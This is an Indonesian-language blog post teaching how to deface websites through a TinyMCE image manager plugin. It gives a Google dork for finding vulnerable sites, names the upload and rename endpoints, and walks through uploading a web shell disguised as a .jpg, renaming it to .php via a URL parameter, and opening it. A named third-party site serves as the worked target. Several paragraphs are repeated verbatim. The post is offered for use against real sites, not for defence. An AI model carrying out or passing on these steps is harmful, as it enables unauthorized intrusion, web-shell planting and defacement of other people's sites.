squadcyber - Hai kawak - kawak, kali ini gw akan membawakan tutorial Deface TinyMce Image Manager yang lagi ramai di kalangan defacer indonesahh, langsung saja.
Lalu copy image address nya, dan langsung exploit dengan exploit di atas tadi, contoh nya http://www.billphan.com.vn/tinymce/plugins/image/image.php, maka akan muncul halaman seperti di bawah.
Setelah itu klik Upload Now dan langsung upload shell kalian yang ber ekstensi .jpg, setelah terupload, klik kanan pada shell kalian yang berbentuk gambar lalu copy link location nya, dan lihat nama shell kalian ber ubah atau tidak, ada site yang nama shell nya berubah ada yang tetap.
Setelah shell kalian terupload, waktu nya kita rename shell nya menjadi .php, cara nya ganti image.php menjadi rename_file.php?current_name=namashell.jpg&new_name=namashell.php, contoh nya http://www.billphan.com.vn/tinymce/plugins/image/rename_file.php?current_name=namashell.jpg&new_name=namashell.php.
Jika sukses, akan muncul seperti ini.
Dan tinggal kalian buka shell nya di /tinymce/plugins/image/uploads/namashell.php.
Dork : inurl:/tinymce/plugins/image/uploads/Pertama dorking dulu dengan dork di atas di google image, kembangkan dork nya dengan otak wibu kalian.
Exploit : /tinymce/plugins/image/image.php, /tinymce/plugins/image/upload.php
Shell : shell ekstensi nya .jpg
Lalu copy image address nya, dan langsung exploit dengan exploit di atas tadi, contoh nya http://www.billphan.com.vn/tinymce/plugins/image/image.php, maka akan muncul halaman seperti di bawah.
Setelah itu klik Upload Now dan langsung upload shell kalian yang ber ekstensi .jpg, setelah terupload, klik kanan pada shell kalian yang berbentuk gambar lalu copy link location nya, dan lihat nama shell kalian ber ubah atau tidak, ada site yang nama shell nya berubah ada yang tetap.
Setelah shell kalian terupload, waktu nya kita rename shell nya menjadi .php, cara nya ganti image.php menjadi rename_file.php?current_name=namashell.jpg&new_name=namashell.php, contoh nya http://www.billphan.com.vn/tinymce/plugins/image/rename_file.php?current_name=namashell.jpg&new_name=namashell.php.
Jika sukses, akan muncul seperti ini.
Dan tinggal kalian buka shell nya di /tinymce/plugins/image/uploads/namashell.php.
Demikian tutorial Deface TinyMce Image Manager, semoga bermanfaat.






Comments
Post a Comment